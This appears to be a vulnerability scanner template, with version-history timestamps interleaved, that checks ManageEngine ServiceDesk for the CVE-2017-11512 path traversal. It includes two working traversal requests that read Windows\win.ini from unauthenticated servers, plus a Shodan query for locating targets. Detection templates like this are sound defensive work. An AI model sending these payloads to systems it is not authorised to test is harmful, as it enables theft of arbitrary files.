2022-05-09 01:59:40 +00:00
id : CVE-2017-11512
info :
2022-06-09 20:35:21 +00:00
name : ManageEngine ServiceDesk 9.3.9328 - Arbitrary File Retrieval
2022-05-09 01:59:40 +00:00
author : 0x_Akoko
severity : high
2022-05-09 07:16:35 +00:00
description : |
2022-06-09 20:35:21 +00:00
ManageEngine ServiceDesk 9.3.9328 is vulnerable to an arbitrary file retrieval due to improper restrictions of the pathname used in the name parameter for the download-snapshot path. An unauthenticated remote attacker can use this vulnerability to download arbitrary files.
2022-05-09 01:59:40 +00:00
reference :
- https://exploit.kitploit.com/2017/11/manageengine-servicedesk-cve-2017-11512.html
2022-05-17 09:18:12 +00:00
- https://www.tenable.com/security/research/tra-2017-31
2022-06-07 20:50:59 +00:00
- https://web.archive.org/web/20210116180015/https://www.securityfocus.com/bid/101789/
2022-10-10 19:22:59 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2017-11512
2022-05-09 01:59:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
cve-id : CVE-2017-11512
cwe-id : CWE-22
2022-05-09 07:16:35 +00:00
metadata :
shodan-query : http.title:"ManageEngine"
2022-06-07 21:01:47 +00:00
verified : "true"
2022-08-27 04:41:18 +00:00
tags : cve,cve2017,manageengine,lfr,unauth,tenable
2022-05-09 01:59:40 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/fosagent/repl/download-file?basedir=4&filepath=..\..\Windows\win.ini'
- '{{BaseURL}}/fosagent/repl/download-snapshot?name=..\..\..\..\..\..\..\Windows\win.ini'
stop-at-first-match : true
matchers :
- type : word
part : body
words :
- "bit app support"
- "fonts"
- "extensions"
condition : and
2022-06-09 20:35:21 +00:00
# Enhanced by mp on 2022/06/09